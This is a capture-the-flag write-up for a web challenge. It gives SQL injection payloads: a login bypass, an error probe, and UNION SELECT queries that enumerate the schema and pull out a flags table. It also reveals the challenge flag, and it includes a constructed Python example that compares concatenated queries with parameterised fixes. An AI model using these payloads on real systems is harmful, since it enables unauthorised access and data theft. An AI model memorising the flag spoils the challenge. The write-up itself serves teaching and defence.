Tags: sqli web sqlinjection
The login portal is very easy to bypass using any standard SQL injection. Here's what I used:
**USERNAME** `admin'; -- -`
**PASSWORD** `anything`
Once we are inside the portal, we are given a search bar, which is again vulnerable to SQL injection. You can verify this by submitting an invalid SQL query and being presented with a MySQL error (e.g. `' AND XXX; -- -`).
Because the search output is rendered in a table, it's very easy to enumerate and extract the entire database schema using `UNION` with `SELECT`.
```sql
' UNION SELECT column_name, 1, 1, 1, 1 FROM information_schema.columns; -- -
```
We can find a table `flags` with the columns `id` and `flag` in it. Use the same kind of query to extract it:
```sql
' UNION SELECT id, flag, 1, 1, 1 from flags; -- -
```
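Why both inputs above work, and what the fix looks like, as an added example that is not the challenge's own code: the application presumably builds its SQL by string concatenation, and bound parameters close both holes. Assumptions: Python's `sqlite3` stands in for the MySQL backend, and the `users`/`items` tables, their columns and all stored values are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the challenge database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'S3cret-constructed');
        CREATE TABLE items (id INTEGER, name TEXT, a INTEGER, b INTEGER, c INTEGER);
        INSERT INTO items VALUES (1, 'widget', 0, 0, 0);
        CREATE TABLE flags (id INTEGER, flag TEXT);
        INSERT INTO flags VALUES (1, 'flag{constructed_placeholder}');
    """)
    return db

def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text: a quote closes the string literal
    # and "-- " comments out the password check.
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None

def login_safe(db, username, password):
    # Bound parameters are sent as data; quotes and comment markers are
    # compared literally and never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def search_vulnerable(db, term):
    # Same flaw in the search box: the term can append a UNION SELECT.
    sql = "SELECT id, name, a, b, c FROM items WHERE name LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()

def search_safe(db, term):
    # The wildcard is added to the bound value, not to the SQL text.
    sql = "SELECT id, name, a, b, c FROM items WHERE name LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    user, pw = "admin'; -- -", "anything"
    union = "' UNION SELECT id, flag, 1, 1, 1 from flags; -- -"
    print("vulnerable login:", login_vulnerable(db, user, pw))
    print("safe login:      ", login_safe(db, user, pw))
    print("vulnerable search:", search_vulnerable(db, union))
    print("safe search:      ", search_safe(db, union))
```

A real login would also compare against a password hash rather than a stored plaintext value; that is left out here to keep the focus on query construction.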
## flag
`flag{SQL_1nj3ct10n_w3b_vuln3r4b1l1ty}`